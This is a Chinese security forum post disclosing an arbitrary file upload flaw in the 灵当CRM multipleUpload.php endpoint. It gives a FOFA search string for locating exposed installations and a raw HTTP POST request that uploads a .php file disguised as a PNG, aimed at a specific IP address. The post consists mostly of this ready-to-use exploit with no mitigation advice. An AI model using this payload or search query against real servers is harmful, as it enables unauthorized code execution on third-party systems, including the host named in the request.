灵当CRM存在任意文件上传漏洞(RCE)-网络安全论坛-网络安全-阻击者联盟

灵当CRM存在任意文件上传漏洞(RCE)

勾八徽章-原创达人-阻击者联盟等级-LV2-阻击者联盟7个月前发布
380

    灵当CRM致力于为企业提供客户管理数字化、销售管理自动化、服务管理智能化、项目管理一体化的个性化CRM行业解决方案,构建全生命周期的数字化管理体系,实现可持续的业绩增长。灵当CRM multipleUpload.php接口处存在文件上传漏洞.

Fofa:body="include/js/ldAjax.js"

394cb9e229fcc00d38ceb13b2a3043a0

 

Payload:

POST /crm/modules/Home/multipleUpload.php?myatt_id=1&myatt_moduel=1 
HTTP/1.1
Host:129.28.177.107
User-Agent:Mozilla/4.0(compatible; MSIE 8.0;Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept:*/*Connection: closeContent-Length: 171
Content-Type: multipart/form-data; boundary=56c3d565ed97bd2177f000e50a5b5029

--56c3d565ed97bd2177f000e50a5b5029
Content-Disposition: form-data; name="file"; filename="65.php"
Content-Type: image/png
test--56c3d565ed97bd2177f000e50a5b5029-

 

评分
欢迎为Ta评分
分享
请登录后发表评论

    没有回复内容

zibll子比主题
本站同款主题模板
zibll子比主题是一款漂亮优雅的网站主题模板,功能强大,配置简单。
查看详情
发布文章发布帖子
扫码添加微信-阻击者联盟
在手机上浏览此页面